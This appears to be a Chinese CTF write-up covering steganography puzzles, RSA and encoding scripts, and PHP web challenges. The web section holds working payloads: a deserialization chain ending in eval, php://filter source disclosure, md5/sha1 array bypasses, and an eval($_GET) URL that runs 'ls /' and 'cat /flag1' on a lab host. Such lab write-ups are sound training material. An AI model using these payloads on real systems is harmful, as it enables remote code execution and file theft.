真签到题 但是不知道为什么没做出来的
末尾有百度云连接下载之后就是这个图片 放大倍数看到flag
题目提示很明显就是要修高高度
对于是jpg图片,我一般用010E 找到高度和宽度然后修改就行,但这里很难找到就尝试搜索
FFC0后三位(我这里找的是第三处) 也有可能是FFC2 都试试就行了
得到flag
binwalk -e 分离 查看文件得到flag
这个题提示很明显了 ,查看文件尾将空格替换 转01得密码,根据提示用encrypto解开
♐︎●︎♋︎♑︎❀︎⬥︎♏︎●︎♏︎♍︎□︎❍︎♏︎♉︎⧫︎□︎♉︎■︎♏︎⬥︎⬧︎♉︎⧫︎□︎♉︎■︎❍︎♍︎♍︎⧫︎♐︎❝︎
https://lingojam.com/WingDing
winding表青解密拿到flag
得到一串诗句,用kali vim 查看发现是 零宽隐写
解密网站
联想到 eyes 利用工具使用SilentEye打开
解得flag
解压 字节反转得到 一个png图片
015a01
026d02
037803
046804
055a05
063306
077407
086a08
094e09
0a6d0a
0b550b
0c300c
0d590d
0e7a0e
0f6b0f
103510
115911
125412
135913
147a14
154f15
164416
176817
186a18
194e19
1a571a
1b511b
1c791c
1d591d
1e541e
1f6c1f
206820
215a21
225422
235a23
246c24
255a25
266a26
275a27
286828
294f29
2a442a
2b512b
2c7a2c
2d592d
2e322e
2f562f
306830
314e31
326e32
333033
343d34
然后用python处理一下 注意这里第[2:4]位是有意义的
这个题题目提示很明显了
这里在简单说一下思路:找B站up 相关视频
抄完代码 后得出来一个文章
然后和原文章对比 多出来的就是flag
这个是原题具体参考
添加链接描述
weekend is worthy to happy!!!! isn't??
t??<BR>";
include 'flag.php';
highlight_file(__FILE__);
$a= $_GET['jiage'];
if($a=='welecome_you_to_jnmc_competition'){
echo $flag;
}
?>
传入
class entrance
{
public $start;
function __construct($start)
{
$this->start = $start;
}
function __destruct()
{
$this->start->helloworld();
}
}
class springboard
{
public $middle;
function __call($name, $arguments)
{
echo $this->middle->hs;
}
}
class evil
{
public $end;
function __construct($end)
{
$this->end = $end;
}
function __get($Attribute)
{
eval($this->end);
}
}
if(isset($_GET['serialize'])) {
unserialize($_GET['serialize']);
} else {
highlight_file(__FILE__);
}
最终是执行evil 类中的__get()方法
那我们这样构造
先命令ls /查看flag 位置 再cat flag文件就行了
php://filter/convert.base64-encode/resource=index.php
然后尝试读取flag
第一层
利用data://text/plain,Floating in the City绕过
if (file_get_contents($file) !== 'Floating in the City')
die("you also is younger
");
第二层
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('jie le dan mei wan quan jin !');
}
}
request 的顺序:GET
request_order = “GP”
因此对于需要 GET 的一些参数,比如 zuishuai,只需要同时 POST 一个数字即可绕过:
第三层 就都是数组绕过了
if(isset($a)){
if ( sha1($c) === sha1($d) && $c != $d ){
if($a!=$b&&md5($a)===md5($b)) {
echo "I learned to be alone all day, so I got drunk and sang this song to entertain myself";
echo "
";
echo "so the flag give you";
echo $flag;
}
}else{
echo 'kuaile jiuhai yibu !!!';
}
}else{
echo "宝!!! the var is not defined!!!";
都绕过运行得到flag
利用重传get参数绕过
http://192.168.0.104:2031/?c=eval($_GET[1]);&1=system(‘ls /’);
查看flag位置
然后获取flag就行了
http://192.168.0.104:2031/?c=eval($_GET[1]);&1=system(‘cat /flag1’);
思路就是爆破
enc_flag=[5312672, 6305588, 4569667, 5470333, 9312353, 8433549, 5158071, 6305588, 5158071, 4857929, 6482239, 6845381, 4293045, 7812036, 6845381, 4293045, 5961976, 6662160, 6482239, 4857929, 4293045, 4857929, 8865691, 7031932, 7812036, 6845381, 9773775]
for i in enc_flag:
for g in range(33,128):
if 5 * pow(g,3) + 66 * g - 100==i:
print(chr(g),end='')
最普通的rsa了
脚本为
from Crypto.Util.number import *
p = 7049120988661090136959367990211624032671088374397430253722914704672269343351268486642692858477617370573493581346846411168539408811542592351582581576539221
q = 11595461299251293002401295606096202123601375776115430944343338141843770078346355504245510150744085418550473572002573306023521368183889972175846278163010889
c = 48425576447741107904942007362859939933300480519833273210397511573241220126734053813936424490872852942885069257318462762079636783871415500644717758273774268724488497979368196170897933989184449432995120246590652553995031347596620505647525475638040859263109628716173897321613612254357251120398449111747305089380
e = 0x10001
import gmpy2
d= gmpy2.invert(e,(p-1)*(q-1))
print(long_to_bytes(gmpy2.powmod(c,d,p*q)))
from Crypto.Util.number import *
n=[77233172536159741192246613655283165880196613060552611951771270688104936106776346258707301903094880666395585340631862009130750364252309591238056576753936210560429561770824923088840307835401343591389063817665516081122335870477455981026885268249200998526090677712273308041387000143133795229713482478393789372621, 70794324572924578170904176367785397571585515343841766471270776641893534562091735386206579244229072036331675198665823877108424439019515198192572105111245725566358049561022661780408911208342637594250037944058109688775177723617220023349151285447135301481172151520373371753145483943469882142519628143415523743463, 93761217774409345065712026096494766259059400214289981179452977682878853429771707722391625256415829980979321889115942716112362554641424767683650504053039711982239972950462675978125739670042221693517477062545050595319035580175500989651485917759297158328957400110168748398966355865895154979662685437655175232187, 124529202589219244628054131473440686077969827415379239572516697161425506945161335214321076138377196624342679966748136249190446302054453599336468401444986625483801237391516131671890908955031274838978095000660651399041484751377373528279323583222966113362380418012251381389500548026241296381301140473951308631467, 60402137932600451202064823101449766068323185392267470715893320550946146689486181577700090960854688975492966004126295374528198973614156097511239714353778658971704224697111332966918059572112633110487150490907161982337993576588831137499701656665339000413922782862243877535428631203689690715707499925757364765349]
c=[25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477, 25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477, 25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477, 25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477, 25681920037857462308038008456804236725305902130578298860433144085656782676411434281544156794249690534545397408244321828543334304937398521739382233631303709676426573143503446051379370337969083171791612381925477]
k=0
import gmpy2
n1=n[0]
c1=c[0]
e=3
while 1:
if(gmpy2.iroot(k*n1+c1,3)[1]==1):
print(long_to_bytes(gmpy2.iroot(k*n1+c1,3)[0]))
break
k+=1
发现全是base系列 那就写个脚本爆破一下
import base64
import random
def b16de(s):
s = base64.b16decode(s.encode()).decode()
print('base16')
return s
def b32de(s):
s = base64.b32decode(s.encode()).decode()
print('base32')
return s
def b64de(s):
s = base64.b64decode(s.encode()).decode()
print('base64')
return s
def main(s):
for i in range(15):
try:
s = b16de(s)
except:
try:
s = b32de(s)
except:
try:
s = b64de(s)
except:
print(s)
f = open('decode.txt','w')
f.write(s)
f.close()
if __name__=="__main__":
f = open('flag.txt','r')#初始文件为basic.txt
s = f.read()
f.close()
main(s)